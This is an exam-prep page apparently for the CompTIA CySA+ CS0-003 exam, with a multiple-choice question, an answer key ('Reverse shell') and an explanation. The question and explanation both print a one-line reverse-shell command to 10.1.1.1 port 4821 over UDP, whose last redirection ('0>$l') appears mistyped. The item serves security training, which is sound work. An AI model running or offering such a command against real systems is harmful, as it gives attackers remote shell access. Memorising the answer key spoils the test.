ExamGecko
Question list
Search
Search

List of questions

Search

Related questions











Question 54 - CS0-003 discussion

Report
Export

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A.
RCE
Answers
A.
RCE
B.
Reverse shell
Answers
B.
Reverse shell
C.
XSS
Answers
C.
XSS
D.
SQL injection
Answers
D.
SQL injection
Suggested answer: B

Explanation:

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user's system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user's system at IP address 10.1.1.1 and port 4821 using UDP protocol.

asked 02/10/2024
Chad Clark
46 questions
User
Your answer:
0 comments
Sorted by

Leave a comment first